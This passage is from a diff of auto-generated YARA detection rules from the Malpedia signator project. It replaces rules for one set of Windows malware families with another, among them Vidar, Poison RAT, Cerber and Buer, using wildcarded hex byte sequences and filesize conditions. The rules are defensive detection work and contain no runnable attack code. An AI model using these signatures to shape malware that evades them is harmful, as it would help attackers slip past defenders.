malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 85db 7435 85f6 7431 } - $sequence_1 = { c744241410000000 c744241000000000 c744240c00000000 c744240800000000 c744240400000000 } - $sequence_2 = { 8b6c243c 3d???????? 741d 896c243c } - $sequence_3 = { a1???????? 8b5c2430 8b742434 8b7c2438 8b6c243c 3d???????? } - $sequence_4 = { 8b7c2438 8b6c243c 85db 7435 } - $sequence_5 = { 7431 896c240c 897c2408 895c2404 893424 } - $sequence_6 = { 8b6c243c 85db 7435 85f6 } - $sequence_7 = { 8b7c2438 8b6c243c 3d???????? 741d 896c243c } - $sequence_8 = { 893424 e8???????? 85c0 7831 } - $sequence_9 = { 7431 896c240c 897c2408 895c2404 } + $sequence_0 = { 80a0609d400000 40 41 41 3bc6 } + $sequence_1 = { 8d442448 53 50 68???????? 53 } + $sequence_2 = { 68???????? ffd6 8bf8 33f6 3bfb 897c241c 0f8cf9000000 } + $sequence_3 = { ff15???????? 8b4c2428 8b542424 51 8b4c2424 52 } + $sequence_4 = { 8d542440 51 52 ff15???????? 85c0 0f8415030000 8b3d???????? } + $sequence_5 = { 52 50 ffd6 6a00 8d8c2414010000 } + $sequence_6 = { 83c408 aa 8d842450040000 6804010000 } + $sequence_7 = { 55 56 8bb42438050000 33db } + $sequence_8 = { 72f1 56 8bf1 c1e603 3b9668774000 0f851c010000 } + $sequence_9 = { 53 51 68???????? ffd6 85c0 } condition: - 7 of them and filesize <2657280 + 7 of them and filesize <90112 } -rule MALPEDIA_Win_Breach_Rat_Auto : FILE +rule MALPEDIA_Win_Atmii_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "f70ab09f-8643-5192-b966-55a3dab88920" + id = "a3746494-2207-5da0-bb5a-0a2c92906b78" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.breach_rat" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.breach_rat_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmii" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.atmii_auto.yar#L1-L170" license_url = "N/A" - logic_hash = "8cb7f4b75bac273a3c54152da1b9e63a78dde17954dfd874b266899e47404327" + logic_hash = "32f9cc90bb902f5f085ec60f456bf3e42304f21478253b8a2c4851a4d1f531ad" score = 75 quality = 75 tags = "FILE" @@ -161243,32 +163986,38 @@ rule MALPEDIA_Win_Breach_Rat_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 5e 5b 8be5 5d c20400 884c240f 8d442418 } - $sequence_1 = { 50 8bce e8???????? 8bc8 e8???????? 8d8dacf6ffff c745fcffffffff } - $sequence_2 = { c1e81f 03c2 8985d8feffff 0f8479080000 83c724 89bde0feffff 8d9b00000000 } - $sequence_3 = { c741140f000000 c7411000000000 c60100 e8???????? ff7510 8d4dd4 ff750c } - $sequence_4 = { 8be5 5d c3 68???????? 8bce e8???????? b001 } - $sequence_5 = { 8b5508 8bcb 0fb712 8bff 663910 7408 83c002 } - $sequence_6 = { 42 8b5de0 3bd6 72f2 8b45a4 2bc6 50 } - $sequence_7 = { c7471800010000 8b4df4 8bc7 c7470400000000 c7470800000000 5f 5e } - $sequence_8 = { eb20 84c9 74ed 8b4df0 8d45d8 50 e8???????? } - $sequence_9 = { e8???????? 68???????? 8d859cf4ffff c745fc5c000000 50 8bce e8???????? } + $sequence_0 = { 6a03 68000000c0 8b0d???????? 51 ff15???????? 8945fc } + $sequence_1 = { 8945ee 0fb705???????? 52 682e010000 50 895dd9 } + $sequence_2 = { 68???????? 50 ffd7 8d9dfcfbffff } + $sequence_3 = { 8d8dd1f9ffff 51 8895c4f9ffff ff15???????? } + $sequence_4 = { 8d95fcfdffff 6a00 52 e8???????? 8b35???????? 83c424 68???????? } + $sequence_5 = { 8945fc 837dfc00 7454 8b4dfc 0fb611 } + $sequence_6 = { 51 e8???????? 8b55f4 83c414 6a00 } + $sequence_7 = { 83c414 8d9df8fcffff e8???????? 8b45f8 85c0 7407 } + $sequence_8 = { 68???????? 68c3000000 8d85f8fcffff 68???????? 50 } + $sequence_9 = { 5f 5b 8be5 5d c3 68???????? 680b010000 } + $sequence_10 = { 837d0803 0f8ceb000000 53 8b1d???????? 57 68???????? } + $sequence_11 = { ffd3 68???????? 68???????? 8985c5f9ffff ffd7 } + $sequence_12 = { c745f800000000 ff15???????? 85c0 0f94c0 8845ff 84c0 742e } + $sequence_13 = { 85ff 0f8448030000 8d55f0 52 6800040000 } + $sequence_14 = { ff2485181d0010 68???????? 8d8df8feffff 51 eb2f 68???????? } + $sequence_15 = { 81ea???????? 83c204 f7d2 8955ed } condition: - 7 of them and filesize <645120 + 7 of them and filesize <49152 } -rule MALPEDIA_Win_Webc2_Qbp_Auto : FILE +rule MALPEDIA_Win_Casper_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "b171d237-d33f-5b2c-9bb0-c659a34a40b8" + id = "682d09f5-eba1-5466-8515-62dee225f20a" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_qbp" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.webc2_qbp_auto.yar#L1-L131" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.casper" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.casper_auto.yar#L1-L129" license_url = "N/A" - logic_hash = "d54f700be976af1656f6aaefd7f02b0196b5db00252f63d6c12db29d09a9a088" + logic_hash = "901b4babc945e8ca2e1c5355e28b2f0271cc8d172828c522a735944d40fb2e3b" score = 75 quality = 75 tags = "FILE" @@ -161282,34 +164031,34 @@ rule MALPEDIA_Win_Webc2_Qbp_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 85c0 7511 8d85e8fcffff 50 ff15???????? } - $sequence_1 = { 3b9090830000 0f8e9d000000 8b4df0 8b819c830000 0345fc 6bc003 99 } - $sequence_2 = { 83c40c c785e0fcffff01000000 ff15???????? 8985f4feffff 8b95e0fcffff 52 8b85f0feffff } - $sequence_3 = { b9fa000000 2bc8 898dd8fcffff 8b95e8fdffff 52 e8???????? 83c404 } - $sequence_4 = { 83ec0c 56 894df4 66c745fc0000 eb0c 668b45fc 66050100 } - $sequence_5 = { 85c0 746d 8d4dfc 51 8d55f8 52 e8???????? } - $sequence_6 = { 8b450c 25ffff0000 50 8b4dec 51 ff15???????? 8945fc } - $sequence_7 = { 0fbf4dec 3bc1 7d7d 8b4de4 e8???????? 668945f4 0fbf55f4 } - $sequence_8 = { 81eafd000000 668955ec 66c745e80000 eb0c 668b45e8 66050100 668945e8 } - $sequence_9 = { 83bde8fdffff00 7574 6800010000 6a00 8d85ecfdffff 50 } + $sequence_0 = { 47 57 50 6801000080 e8???????? 85c0 756f } + $sequence_1 = { e8???????? 8b7b34 85ff 7405 e8???????? } + $sequence_2 = { 885006 8b55fc c1ea18 885007 8bd3 c1ea08 885009 } + $sequence_3 = { 51 a1???????? 85c0 751a e8???????? 689c9678bf 68???????? } + $sequence_4 = { 837de803 752a 837df808 8b75f4 7514 85f6 742b } + $sequence_5 = { 8bbb48010000 8b8b68010000 33d2 8bc7 f7f1 85d2 7406 } + $sequence_6 = { 8bd8 8d4510 50 81ce19000200 } + $sequence_7 = { 85ff 7405 e8???????? 8bce e8???????? 5f 5e } + $sequence_8 = { 50 57 57 6800000008 53 57 57 } + $sequence_9 = { 7504 8bde eb03 83c305 68???????? 53 e8???????? } condition: - 7 of them and filesize <630784 + 7 of them and filesize <434176 } -rule MALPEDIA_Win_Turla_Silentmoon_Auto : FILE +rule MALPEDIA_Win_Vidar_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "74286b0f-5712-5890-afe4-259cc8765b9b" + id = "82d78950-07cb-574b-bd37-68a5c755b922" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.turla_silentmoon" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.turla_silentmoon_auto.yar#L1-L127" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.vidar_auto.yar#L1-L344" license_url = "N/A" - logic_hash = "f84d11e90ac1422010cde8ffffe4ee94ce33e7fe9731643e241a69ac7f1c820c" + logic_hash = "a393071c5079ff4f7beb96e2467045a96573fe4c259d05f0ce07fde763d7466d" score = 75 - quality = 75 + quality = 73 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -161321,32 +164070,60 @@ rule MALPEDIA_Win_Turla_Silentmoon_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 88442453 a1???????? 89442430 a0???????? 53 56 88442444 } - $sequence_1 = { 8b4508 85c0 0f84f9010000 8938 5e 5b 8be5 } - $sequence_2 = { 51 6800001000 53 56 ff15???????? 83f801 } - $sequence_3 = { b950000000 e8???????? 83c404 6a08 b990000000 e8???????? } - $sequence_4 = { 8b94bd28feffff 8d441001 8b55f0 8955d4 8b94bd28feffff 8955d8 8b55f0 } - $sequence_5 = { 3bd1 7c9a 0fb608 3bd1 7e66 83be5c02000008 7c2f } - $sequence_6 = { 48 83f803 0f878a000000 ff248588344000 8bc3 e8???????? } - $sequence_7 = { 85ff 0f8f82fcffff 5f 5b } - $sequence_8 = { 7e0a 8b4df0 8b7dd8 33c0 f3ab 8145d808040000 } - $sequence_9 = { 741f 8b4508 85c0 7406 c700faffffff c787c4130000faffffff 5e } + $sequence_0 = { 25ff7f0000 c3 e8???????? 8b486c 3b0d???????? 7410 } + $sequence_1 = { 05c39e2600 894114 c1e810 25ff7f0000 c3 e8???????? } + $sequence_2 = { 8d8d68fdffff 51 50 ff15???????? } + $sequence_3 = { 7202 8b00 8d8d68fdffff 51 } + $sequence_4 = { 740a b800000500 e9???????? 57 } + $sequence_5 = { 56 8b742408 8b865caf0100 57 } + $sequence_6 = { 895dd0 c746140f000000 895e10 8975cc } + $sequence_7 = { 8b8648af0100 c1e803 038644af0100 5e 5d c3 } + $sequence_8 = { 895dfc e8???????? 83781408 c645fc01 } + $sequence_9 = { 8b7508 33ff 89b55cfdffff 89bd60fdffff } + $sequence_10 = { 5f c6043300 8bc6 5e 5b c20400 } + $sequence_11 = { 50 ff15???????? 8b4da0 8901 85c0 } + $sequence_12 = { 83781410 7202 8b00 50 8b45a0 } + $sequence_13 = { eb02 33c0 5f 5e c9 c3 6a04 } + $sequence_14 = { 5e c20400 ff742408 e8???????? 59 83f8ff 7503 } + $sequence_15 = { c9 c3 8b542408 85d2 7503 } + $sequence_16 = { 0fb605???????? 50 0fb605???????? 50 0fb605???????? 50 6a01 } + $sequence_17 = { 53 50 899e6caf0600 e8???????? } + $sequence_18 = { 53 68???????? 8d8da8000000 e8???????? } + $sequence_19 = { c3 55 8bec 83ec0c 8365fc00 8365f400 8365f800 } + $sequence_20 = { c20400 56 8bf1 e8???????? 6a00 ff74240c 8bce } + $sequence_21 = { 0faf450c 50 e8???????? 59 } + $sequence_22 = { 8b4508 8906 8b450c 894608 } + $sequence_23 = { 8b4120 8910 8b4130 8910 c3 56 } + $sequence_24 = { e8???????? c9 c3 55 8bec 83ec18 8b450c } + $sequence_25 = { 8d852cffffff 50 8d459c 50 } + $sequence_26 = { 6860ea0000 6a00 ff15???????? 50 } + $sequence_27 = { 50 ff15???????? 6a1a e8???????? } + $sequence_28 = { 5f c21000 8bff 55 8bec 6a0a } + $sequence_29 = { e8???????? 83c410 85c0 7404 6a99 ebcc } + $sequence_30 = { 7410 84c0 7406 3ac8 7c14 } + $sequence_31 = { 7408 ff36 e8???????? 59 834e04ff 8b06 } + $sequence_32 = { e8???????? 83c408 84c0 740e 68???????? } + $sequence_33 = { 6a0b 6a10 e8???????? 83c41c 8be5 } + $sequence_34 = { eb0b 8b45f4 0500040000 8945f4 } + $sequence_35 = { 83ec08 dd4508 dd1c24 6a0b 6a08 } + $sequence_36 = { 8bc6 8b35???????? 99 2bc2 } + $sequence_37 = { 8bc6 5f 5e 5d 5b 81c460010000 c3 } condition: - 7 of them and filesize <204800 + 7 of them and filesize <2793472 } -rule MALPEDIA_Win_Avcrypt_Auto : FILE +rule MALPEDIA_Win_Defray_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "f0c2c6c6-0e09-5b4b-89b9-13d38222f492" + id = "ee2cc914-ed1c-504f-bf38-50caf0bf4350" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.avcrypt" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.avcrypt_auto.yar#L1-L129" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.defray" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.defray_auto.yar#L1-L132" license_url = "N/A" - logic_hash = "ac05395b3ceaf430ebcb56d0def5da87a92c07f9636a33b891b2fc3647618543" + logic_hash = "6779b35681313abc4956d5610d5c5eb736ab6b4450531cda5b5e81d10fef89b6" score = 75 quality = 75 tags = "FILE" @@ -161360,32 +164137,32 @@ rule MALPEDIA_Win_Avcrypt_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 68???????? ffd3 834dfcff 8d4dd8 56 6a01 e8???????? } - $sequence_1 = { 8bc7 8bcf c1f805 83e11f c1e106 030c8580b54300 eb05 } - $sequence_2 = { 8d4dc0 56 e8???????? 59 6a0e 33f6 5b } - $sequence_3 = { c705????????70484300 c705????????8cbf4300 890d???????? 8935???????? } - $sequence_4 = { 50 ff15???????? 83c8ff e9???????? 57 6a09 59 } - $sequence_5 = { ff15???????? 85c0 7507 68???????? ffd6 895de4 837dd000 } - $sequence_6 = { 68???????? e8???????? 83ec18 c745fc15000000 8bcc 8965d4 53 } - $sequence_7 = { c645fc0e 837db800 7519 68???????? 8d8d78ffffff e8???????? } - $sequence_8 = { e8???????? 68???????? 8d8d84feffff c645fc08 e8???????? 68???????? 8d8d9cfeffff } - $sequence_9 = { e8???????? c645fc01 8b5de0 85db 7404 8b13 } + $sequence_0 = { 3bc1 75c3 894db4 8d8d60ffffff e8???????? 84c0 7419 } + $sequence_1 = { 8b0b 8bc1 83e13f c1f806 6bc930 8b048568f34800 } + $sequence_2 = { 33c0 8dbd94f5ffff a5 a5 a5 8dbda0f5ffff be???????? } + $sequence_3 = { 2bf2 8d7b1f c1ef05 c1fe02 897d08 3bfe 7322 } + $sequence_4 = { 83c9f8 41 0f2825???????? 8bd6 0f282d???????? 2bd1 0f57db } + $sequence_5 = { 33c6 03d0 8b85e0feffff 03940514ffffff 039008d54700 03d7 8bbde4feffff } + $sequence_6 = { 56 6a02 51 8975fc 8975f8 ff15???????? } + $sequence_7 = { 663907 7407 83c702 3bfe 75f4 3bfe 0f8434feffff } + $sequence_8 = { 8bf0 85f6 0f8528050000 8b45d8 c745f4006d4100 8945f8 837d1000 } + $sequence_9 = { 6a0c 99 5f f7ff 8365e000 8b7508 85c0 } condition: - 7 of them and filesize <6160384 + 7 of them and filesize <1253376 } -rule MALPEDIA_Win_Acbackdoor_Auto : FILE +rule MALPEDIA_Win_Rockloader_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "3b37a750-d7e0-5ba6-b796-2dbd4d0ee414" + id = "175eaa7b-da5b-50b8-b46d-cecd53211dcf" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.acbackdoor" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.acbackdoor_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rockloader" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.rockloader_auto.yar#L1-L117" license_url = "N/A" - logic_hash = "429f71da1516445c35871fa605cbaf3bc00568c9cb40515ab43ec3dc7a2d0a3f" + logic_hash = "8a75e6c1f9302fef80e04ef409ea5d10afc0d829be15769e71fe72b02405b4ff" score = 75 quality = 75 tags = "FILE" @@ -161399,32 +164176,32 @@ rule MALPEDIA_Win_Acbackdoor_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ba04000000 e9???????? 8b542448 8b4c244c 8b742440 89542420 894c2424 } - $sequence_1 = { ebbd 8b442440 890424 ff15???????? 83ec04 89c3 83c42c } - $sequence_2 = { c744240c76070000 c7442408???????? c744240404000000 892c24 e8???????? 8b442438 892c24 } - $sequence_3 = { 8b7904 895c2408 894c2404 890424 e8???????? 8b4c243c 0fb64500 } - $sequence_4 = { e8???????? 85c0 7e06 83c414 5b 5e c3 } - $sequence_5 = { e8???????? 8b06 8b5054 85d2 0f8415fdffff 8b4050 85c0 } - $sequence_6 = { c744241087934a00 c744240cc8000000 c7442408???????? c744240401000000 892c24 e8???????? 8b85c4000000 } - $sequence_7 = { 89c8 8b4c2430 31de 8b5c2434 8987d0000000 894f50 895f54 } - $sequence_8 = { e8???????? 8b83c4000000 c783cc00000004000000 c783c800000016000000 c60000 891c24 e8???????? } - $sequence_9 = { e8???????? 8bbc241c020000 8d742434 31db 85ff 7e1e 8b86f0010000 } + $sequence_0 = { e8???????? dc1d???????? dfe0 f6c441 740f } + $sequence_1 = { e8???????? 85c0 74b4 c6002c 40 837d0c00 7404 } + $sequence_2 = { 8a06 3c22 750c ff7508 8bc6 e8???????? } + $sequence_3 = { 8b45f4 8945e8 8d45f8 50 8d45e4 } + $sequence_4 = { eb05 68???????? e8???????? 8bf8 8bc7 } + $sequence_5 = { e8???????? 33f6 53 8975f8 } + $sequence_6 = { 3975f4 7e55 53 8b45f8 } + $sequence_7 = { ff4608 8b7f08 85ff 7452 8b4508 } + $sequence_8 = { d9ee 53 56 dd55ec d9e8 33f6 } + $sequence_9 = { 8975f8 db45f8 8365f800 dec1 dd5ddc 9b } condition: - 7 of them and filesize <1704960 + 7 of them and filesize <98304 } -rule MALPEDIA_Win_Tiop_Auto : FILE +rule MALPEDIA_Win_Taleret_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "a48d1e15-9fc1-5bab-9fa2-c3c7b063ec8e" + id = "90652d3d-3308-5c4e-91b0-de6f7ec4ea56" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tiop" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.tiop_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.taleret" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.taleret_auto.yar#L1-L124" license_url = "N/A" - logic_hash = "62d0ea75fcf8689409f77f7c307d37bf3637d8a3da71cff9b0be16f18afd1eb3" + logic_hash = "0af9ed1f3725609b54a6e19f400c5abe16095e727614fae56d9f4e23ded04fd2" score = 75 quality = 75 tags = "FILE" @@ -161438,32 +164215,32 @@ rule MALPEDIA_Win_Tiop_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 81ec08010000 55 56 57 b940000000 33c0 8d7c2411 } - $sequence_1 = { ff15???????? 50 ff15???????? 8b3d???????? 8bf0 ffd7 50 } - $sequence_2 = { 57 33ed b94f000000 33c0 8d7c240c 896c2408 892d???????? } - $sequence_3 = { ff15???????? 50 8b44241c 53 50 ff5510 8b4c241c } - $sequence_4 = { 8b7c2410 56 8b35???????? 894704 ffd6 55 ffd6 } - $sequence_5 = { f3a4 8b442414 8b7500 8b4c2410 2bf0 03d0 897500 } - $sequence_6 = { eb2e 50 ffd3 8d7c0002 8bc7 83c003 24fc } - $sequence_7 = { 6a01 6a00 ffd7 8b1d???????? 8bf0 56 89742410 } - $sequence_8 = { 83c9ff 33c0 83c404 f2ae f7d1 6a10 49 } - $sequence_9 = { 8b542418 8b4c2420 8b3d???????? 8944240c 8b44242c 89542408 8b542424 } + $sequence_0 = { c68424b40300000d e8???????? 50 8d4b18 } + $sequence_1 = { 8b44240c 8b4c2408 8b542404 6a00 6a00 6a03 68???????? } + $sequence_2 = { 51 50 68???????? 890d???????? } + $sequence_3 = { 8d442408 c744242401000000 50 ff15???????? 85c0 7528 8b4c2438 } + $sequence_4 = { 8d4e3c c644241c05 e8???????? 8d4e40 c644241c06 e8???????? } + $sequence_5 = { c60600 e8???????? 83c40c 85c0 7526 57 8d8c24e8000000 } + $sequence_6 = { 85c0 0f85b2000000 a1???????? 668b0d???????? 8a15???????? 89842480000000 } + $sequence_7 = { c684247016000001 e8???????? 8b9c247c160000 8b6c241c e9???????? 8b442424 8b4c2414 } + $sequence_8 = { 8a440444 eb02 b03d 83fd01 884301 7e33 } + $sequence_9 = { e8???????? 83c408 33f6 e8???????? 8a96f0700010 32d0 } condition: - 7 of them and filesize <712704 + 7 of them and filesize <73728 } -rule MALPEDIA_Win_Babyshark_Auto : FILE +rule MALPEDIA_Win_Buer_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "bba62dea-b8fb-5177-af59-ee7484609223" + id = "29f2986a-0230-51bb-b9a2-7f550ca2fb77" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.babyshark" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.babyshark_auto.yar#L1-L124" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.buer" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.buer_auto.yar#L1-L170" license_url = "N/A" - logic_hash = "170a55c792dd841a430b5276e4b7ea8cd0c0e2d28c406b503a22728951bd6c1d" + logic_hash = "2390d8b9be10e4a78955cb4e4f9dfe589bef2af5ea30193017caa2f367cbde8d" score = 75 quality = 75 tags = "FILE" @@ -161477,32 +164254,38 @@ rule MALPEDIA_Win_Babyshark_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 83c40c 8d4c2404 6a00 51 ffd6 6a00 } - $sequence_1 = { 8bc8 83e01f c1f905 8b0c8d607e4000 8a44c104 83e040 } - $sequence_2 = { 8b0c8d607e4000 8a44c104 83e040 c3 a1???????? } - $sequence_3 = { bf???????? f3ab 8d3452 895dfc c1e604 aa 8d9ec8674000 } - $sequence_4 = { 80e920 ebe0 80a0206c400000 40 3bc6 72be 5e } - $sequence_5 = { 8db6bc674000 bf???????? a5 a5 59 a3???????? } - $sequence_6 = { 8a8094504000 83e00f eb02 33c0 0fbe84c6b4504000 } - $sequence_7 = { c1f804 83f807 8945d0 0f879a060000 ff2485271a4000 834df0ff } - $sequence_8 = { 5e 8d0c8dc8614000 3bc1 7304 3910 7402 } - $sequence_9 = { ff15???????? 8bf0 68???????? 8d442408 68???????? 50 } + $sequence_0 = { 8b4014 8b00 8b4010 8945fc 61 8b45fc } + $sequence_1 = { 7507 e8???????? eb05 e8???????? 46 83fe20 7cd1 } + $sequence_2 = { 60 64a130000000 8b400c 8b4014 8b00 8b4010 } + $sequence_3 = { 8bc2 eb19 33c0 85d2 7e13 3bc7 } + $sequence_4 = { 8b55e8 015158 8b55d8 894148 8b45dc 03c6 89414c } + $sequence_5 = { c1e104 0bc8 6a02 5b } + $sequence_6 = { 8945f8 ff15???????? 59 59 85c0 } + $sequence_7 = { 8365fc00 53 56 57 60 64a130000000 8b400c } + $sequence_8 = { c744240402000000 8d442428 c7442408???????? c744240c01000000 } + $sequence_9 = { e8???????? 80fb03 7705 80fb02 } + $sequence_10 = { e8???????? 0f0b b92c000000 ba01000000 e8???????? 0f0b 89f9 } + $sequence_11 = { c744240401000000 c7442408???????? c744240c01000000 89442410 } + $sequence_12 = { e8???????? 56 6a00 50 e8???????? c7471c01000000 } + $sequence_13 = { c744240800000000 57 e8???????? 85c0 } + $sequence_14 = { cd29 0f0b cc 8b442404 833800 7406 ba???????? } + $sequence_15 = { e8???????? 80fb05 ba01000000 0fb6c3 } condition: - 7 of them and filesize <65272 + 7 of them and filesize <3031040 } -rule MALPEDIA_Win_Cerber_Auto : FILE +rule MALPEDIA_Win_Suncrypt_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "1b1175b4-aaae-5323-bbb6-472b8daa3220" + id = "93d1d1b0-e368-5e85-941c-a502b4af6a15" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cerber" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cerber_auto.yar#L1-L101" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.suncrypt" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.suncrypt_auto.yar#L1-L131" license_url = "N/A" - logic_hash = "90183139badfe5f943ec4dd7b3bc0305f6ea2215a75a5dc8603646346366cf36" + logic_hash = "3fd8ca759efc6a63a6777db0d881129a01860e6b4243db4bd8968c844a421043" score = 75 quality = 75 tags = "FILE" @@ -161516,30 +164299,32 @@ rule MALPEDIA_Win_Cerber_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 4a 79f6 5f 8bc6 } - $sequence_1 = { 85c0 750c 8b33 e8???????? 832300 eb0e 8b4dfc } - $sequence_2 = { 33f9 8b88e0000000 894dd0 8b88e4000000 899864010000 8b5dd8 } - $sequence_3 = { 4a 79e6 47 3b7d0c } - $sequence_4 = { 51 53 56 8bf0 57 85f6 7508 } - $sequence_5 = { 4a b800000080 83e904 eb02 } - $sequence_6 = { 895df4 33c9 83fa08 0f9dc1 854df4 7515 } - $sequence_7 = { 33f9 8b88e8feffff 234808 8998fc000000 8b5874 } + $sequence_0 = { ff15???????? 6a00 6a00 6a03 6a00 6a00 ff75b8 } + $sequence_1 = { 8b8d60ffffff 8945c8 8b856cffffff 8945ac 8b8564ffffff 8945cc 8b855cffffff } + $sequence_2 = { c645f84c c645f90e c645fa44 c645fb4c c645fc4c 8a45f4 c645fd00 } + $sequence_3 = { 02ca 0fbec0 33c8 884c15ec 42 83fa11 72e8 } + $sequence_4 = { 894dd0 034d98 8bf9 337dcc c1c70c 03c7 898534ffffff } + $sequence_5 = { c3 8b07 0fb74f0e 8b4004 8b0488 894724 } + $sequence_6 = { 8b7308 83c140 8b7da0 894df4 8b4df0 eb7e } + $sequence_7 = { 8b45a8 0411 c645be00 83f00a 33d2 8845bd 8a45ac } + $sequence_8 = { 660f6dec 660fefd8 660f6ccc 0f28a500feffff 0f1118 83c010 0f1007 } + $sequence_9 = { 7324 8d0c10 2bf2 894df0 8b4df8 2bca } condition: - 7 of them and filesize <573440 + 7 of them and filesize <172032 } -rule MALPEDIA_Win_Chinoxy_Auto : FILE +rule MALPEDIA_Win_Poison_Rat_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "916e0861-f860-58c8-9808-fcfac5c4f41d" + id = "3901c97f-e38d-5819-991e-493be520fc51" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.chinoxy" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.chinoxy_auto.yar#L1-L133" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.poison_rat" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.poison_rat_auto.yar#L1-L118" license_url = "N/A" - logic_hash = "eeb7ce09274161abdb807fd23b8c72ae21763a7e3cd9b91cd84dd2d99cf4e640" + logic_hash = "b960cb72b2615d9b184a9e25264d3c87f1ec796c5d1b6fa8620d3a64be9786ae" score = 75 quality = 75 tags = "FILE" @@ -161553,32 +164338,32 @@ rule MALPEDIA_Win_Chinoxy_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d4704 50 ff15???????? 8d8e90200000 c744241800000000 e8???????? 85c0 } - $sequence_1 = { 8d842424010000 50 e8???????? 8b9318040000 8d8c2428010000 51 52 } - $sequence_2 = { 2bcd c1e013 c1ef0d 0bc7 03ee 33c1 8bf8 } - $sequence_3 = { 897e18 8b4c2410 895e10 895e14 8bc6 5f 5e } - $sequence_4 = { e8???????? 85c0 741f 668b4c242c 6a08 66894802 50 } - $sequence_5 = { 8b8ef0000000 8d86e8000000 3bc8 c744241c00000000 7405 394004 7538 } - $sequence_6 = { 8d4c2410 6689542414 66895c2424 6689542430 66895c2438 66895c245c } - $sequence_7 = { 8d8ec8020000 e8???????? 8d86d4020000 8b4c240c 894004 894008 c700???????? } - $sequence_8 = { 